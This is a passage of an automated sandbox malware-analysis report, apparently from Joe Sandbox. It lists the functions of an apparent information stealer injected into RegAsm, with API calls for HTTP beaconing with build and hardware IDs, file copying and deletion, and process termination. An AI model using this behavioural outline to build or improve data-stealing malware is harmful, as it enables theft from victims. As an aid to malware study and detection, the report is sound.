                                                                            • Opcode ID: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                            • Instruction ID: 1ecdebe3f11d8fac3e9d0efa643fe933af64b4fe52e77a22e07e9b20bef025ed
                                                                            • Opcode Fuzzy Hash: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                            • Instruction Fuzzy Hash: 98C16971800159EEDB15EBE4ED1AEEEBB75BF18304F10403AF511721E1DB782A09DB25
                                                                            Function 0041390C Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 825sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2603 41390c-4139c5 _EH_prolog call 4135ac call 40f997 * 3 call 40f923 * 6 2624 4139c9-4139d0 call 402283 2603->2624 2627 413a64-413ae5 call 4020f9 call 402113 call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2624->2627 2628 4139d6-413a5f call 4020f9 call 40f9e1 call 40f98e call 40212d call 40f95a call 4010b1 call 41303a call 40f9e1 2624->2628 2658 413b50-413b66 call 40fb4d StrCmpCA 2627->2658 2659 413ae7-413b29 call 40212d call 40f95a call 4010b1 call 41303a 2627->2659 2663 413b47-413b4b call 40f98e 2628->2663 2668 41435b-4143ba call 40f9e1 call 40212d call 40f9e1 call 40f98e call 402286 call 40f9e1 call 40f98e call 4132d9 2658->2668 2669 413b6c-413b73 call 40227f 2658->2669 2687 413b2e-413b41 call 40f9e1 2659->2687 2663->2658 2760 4143bf-414436 call 40f98e * 6 call 413295 call 401061 2668->2760 2676 413b79-413b80 call 402283 2669->2676 2677 413cfd-413d13 call 40fb4d StrCmpCA 2669->2677 2689 413c11-413c92 call 402147 call 402161 call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2676->2689 2690 413b86-413c0c call 402147 call 40f9e1 call 40f98e call 40217b call 402147 call 4010b1 call 41303a call 40f9e1 2676->2690 2691 414316-414356 call 40f9e1 call 40217b call 40f9e1 call 40f98e call 4022a0 2677->2691 2692 413d19-413d20 call 402283 2677->2692 2687->2663 2689->2677 2815 413c94-413cee call 40217b call 40f95a call 4010b1 call 41303a call 40f9e1 2689->2815 2832 413cf4-413cf8 call 40f98e 2690->2832 2772 414266-41428a call 40f9e1 call 40f98e call 4132d9 2691->2772 2708 413d26-413d2d call 402283 2692->2708 2709 413eaa-413ec0 call 40fb4d StrCmpCA 2692->2709 2726 413d33-413db9 call 402195 call 40f9e1 call 40f98e call 4021c9 call 402195 call 4010b1 call 41303a call 40f9e1 2708->2726 2727 413dbe-413e3f call 402195 call 4021af call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2708->2727 2728 4142d1-414311 call 40f9e1 call 4021c9 call 40f9e1 call 40f98e call 4022ba 2709->2728 2729 413ec6-413ecd call 402283 2709->2729 2895 413ea1-413ea5 call 40f98e 2726->2895 2727->2709 2882 413e41-413e9b call 4021c9 call 40f95a call 4010b1 call 41303a call 40f9e1 2727->2882 2728->2772 2752 413ed3-413eda call 402283 2729->2752 2753 414057-41406d call 40fb4d StrCmpCA 2729->2753 2776 413ee0-413f66 call 4021e3 call 40f9e1 call 40f98e call 402217 call 4021e3 call 4010b1 call 41303a call 40f9e1 2752->2776 2777 413f6b-413fec call 4021e3 call 4021fd call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2752->2777 2778 414073-41407a call 402283 2753->2778 2779 41428f-4142cf call 40f9e1 call 402217 call 40f9e1 call 40f98e call 4022d4 2753->2779 2772->2760 2939 41404e-414052 call 40f98e 2776->2939 2777->2753 2931 413fee-414048 call 402217 call 40f95a call 4010b1 call 41303a call 40f9e1 2777->2931 2811 414080-414087 call 402283 2778->2811 2812 4141fe-414214 call 40fb4d StrCmpCA 2778->2812 2779->2772 2847 414118-414199 call 402231 call 40224b call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2811->2847 2848 41408d-414113 call 402231 call 40f9e1 call 40f98e call 402265 call 402231 call 4010b1 call 41303a call 40f9e1 2811->2848 2849 414226-414262 call 40f9e1 call 402265 call 40f9e1 call 40f98e call 4022ee 2812->2849 2850 414216-414221 Sleep 2812->2850 2815->2832 2832->2677 2847->2812 2957 41419b-4141f2 call 402265 call 40f95a call 4010b1 call 41303a call 40f9e1 2847->2957 2962 4141f5-4141f9 call 40f98e 2848->2962 2849->2772 2850->2624 2882->2895 2895->2709 2931->2939 2939->2753 2957->2962 2962->2812
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00413911
                                                                              • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                              • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                              • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413ADD
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0041303A: _EH_prolog.MSVCRT ref: 0041303F
                                                                              • Part of subcall function 0041303A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C8A
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D0B
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E37
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413EB8
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413FE4
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414065
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414191
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041420C
                                                                            • Sleep.KERNEL32(0000EA60), ref: 0041421B
                                                                              • Part of subcall function 00413118: _EH_prolog.MSVCRT ref: 0041311D
                                                                              • Part of subcall function 00413118: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                              • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                              • Part of subcall function 00413118: StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                              • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                              • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                            • String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                            • API String ID: 1345713276-3681523784
                                                                            • Opcode ID: 505f916443a8155cce969c46bc05582c1e74d202306969a7660cc8c93faf51c3
                                                                            • Instruction ID: ba2ef69668dbee3cc8c09a903ddfb9f5b99e769ff53e208b1ce9b21879ea8b17
                                                                            • Opcode Fuzzy Hash: 505f916443a8155cce969c46bc05582c1e74d202306969a7660cc8c93faf51c3
                                                                            • Instruction Fuzzy Hash: 596263B0904248EADB10EBE5C956BDEBBB89F19304F5041BEF445B32C1DB785B4C8766
                                                                            Function 00403AF5 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513networkstringfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2976 403af5-403bc4 _EH_prolog call 40f95a call 403a54 call 40f923 * 5 call 40fb4d InternetOpenA StrCmpCA 2993 403bc6 2976->2993 2994 403bc8-403bcb 2976->2994 2993->2994 2995 403bd1-403d4f call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 2994->2995 2996 404122-4041b1 InternetCloseHandle call 410a94 * 2 call 40f98e * 8 2994->2996 2995->2996 3067 403d55-403d88 HttpOpenRequestA 2995->3067 3068 404119-40411c InternetCloseHandle 3067->3068 3069 403d8e-403d90 3067->3069 3068->2996 3070 403d92-403da2 InternetSetOptionA 3069->3070 3071 403da8-4040b3 call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40f923 call 40fa28 * 2 call 40f9e1 call 40f98e * 2 call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA call 40fb4d HttpSendRequestA 3069->3071 3070->3071 3182 4040ef-404104 InternetReadFile 3071->3182 3183 4040b5-4040ba 3182->3183 3184 404106-404114 InternetCloseHandle call 40f98e 3182->3184 3183->3184 3186 4040bc-4040ea call 40fa9c call 40f9e1 call 40f98e 3183->3186 3184->3068 3186->3182
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00403AFA
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00425975,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404107
                                                                            • InternetCloseHandle.WININET(?), ref: 0040411C
                                                                            • InternetCloseHandle.WININET(?), ref: 00404125
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                            • String ID: !$"$"$------$------$------$build_id$hwid
                                                                            • API String ID: 1139859944-3346224549
                                                                            • Opcode ID: 6763fc035234d5979cabe930e44d953dfd0e215cef660ea1f11e82d7fcc9c962
                                                                            • Instruction ID: b0e5e0d41a604fbf99728ef0725b538a38cb0714067dfec9b32dda745c4f151e
                                                                            • Opcode Fuzzy Hash: 6763fc035234d5979cabe930e44d953dfd0e215cef660ea1f11e82d7fcc9c962
                                                                            • Instruction Fuzzy Hash: 31223AB190414CEADB11EBE4C956BEEBBB8AF18308F5041BEE50573582DB781B4CCB65
                                                                            Function 00406737 Relevance: 33.5, APIs: 22, Instructions: 511stringmemoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040673C
                                                                              • Part of subcall function 0040FB28: StrCmpCA.SHLWAPI(?,?,?,00408A88,00425D7C,00000000), ref: 0040FB31
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425B78,?,?,?,00425B4E,?,00000000), ref: 004068A8
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00411056: _EH_prolog.MSVCRT ref: 0041105B
                                                                              • Part of subcall function 00411056: memset.MSVCRT ref: 0041107D
                                                                              • Part of subcall function 00411056: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                              • Part of subcall function 00411056: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                              • Part of subcall function 00411056: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A9A
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00406AA1
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00406BBF
                                                                            • lstrcat.KERNEL32(00000000,00425B94), ref: 00406BCD
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00406BDF
                                                                            • lstrcat.KERNEL32(00000000,00425B98), ref: 00406BED
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00406D34
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00406D42
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • memset.MSVCRT ref: 00406D9A
                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00406DBF
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 4187064601-0
                                                                            • Opcode ID: 8e1653efa4f5854faced7d70c72396407c3d3c249bef8c47c695785d4c6cb76f
                                                                            • Instruction ID: ba7657a0882041a922700d4e4b68e078784f46e31e746cb862f522f044a4a9e6
                                                                            • Opcode Fuzzy Hash: 8e1653efa4f5854faced7d70c72396407c3d3c249bef8c47c695785d4c6cb76f
                                                                            • Instruction Fuzzy Hash: 9F224771904248EEDF15EBE4DD56AEEBB75AF18308F50407EF402721D2DB782A09DB26
                                                                            Function 00408759 Relevance: 33.4, APIs: 22, Instructions: 407stringmemoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040875E
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425D70,?,?,?,00425B92,00000000), ref: 00408841
                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089AE
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 004089B5
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00408AD8
                                                                            • lstrcat.KERNEL32(00000000,00425D84), ref: 00408AE6
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00408AF8
                                                                            • lstrcat.KERNEL32(00000000,00425D88), ref: 00408B06
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00408C19
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00408C27
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • memset.MSVCRT ref: 00408C7F
                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00408CA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                            • String ID:
                                                                            • API String ID: 156379684-0
                                                                            • Opcode ID: 43e7eccc74614d8f611f5c667144751c4e0face382e07e427c529d3e51f79cf1
                                                                            • Instruction ID: 995570c1c0ce675a9085062181732195259fe43f91e974d6a0640a795ee953cc
                                                                            • Opcode Fuzzy Hash: 43e7eccc74614d8f611f5c667144751c4e0face382e07e427c529d3e51f79cf1
                                                                            • Instruction Fuzzy Hash: 3AF15771804158EADB15EBE4DD1ABEEBB74AF18308F10807EE505721E2DF782A09DB25
                                                                            Function 0041077C Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 155memorycomtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00410781
                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                            • CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?), ref: 004107C4
                                                                            • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                            • VariantInit.OLEAUT32(?), ref: 00410855
                                                                              • Part of subcall function 004106C4: _EH_prolog.MSVCRT ref: 004106C9
                                                                              • Part of subcall function 004106C4: CoCreateInstance.OLE32(00426D04,00000000,00000001,00426430,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                              • Part of subcall function 004106C4: SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                              • Part of subcall function 004106C4: _wtoi64.MSVCRT ref: 00410738
                                                                              • Part of subcall function 004106C4: SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                              • Part of subcall function 004106C4: SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 0041088D
                                                                            • GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 00410893
                                                                            • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory), ref: 004108A0
                                                                            • VariantClear.OLEAUT32(?), ref: 004108E2
                                                                            • wsprintfA.USER32 ref: 004108CC
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
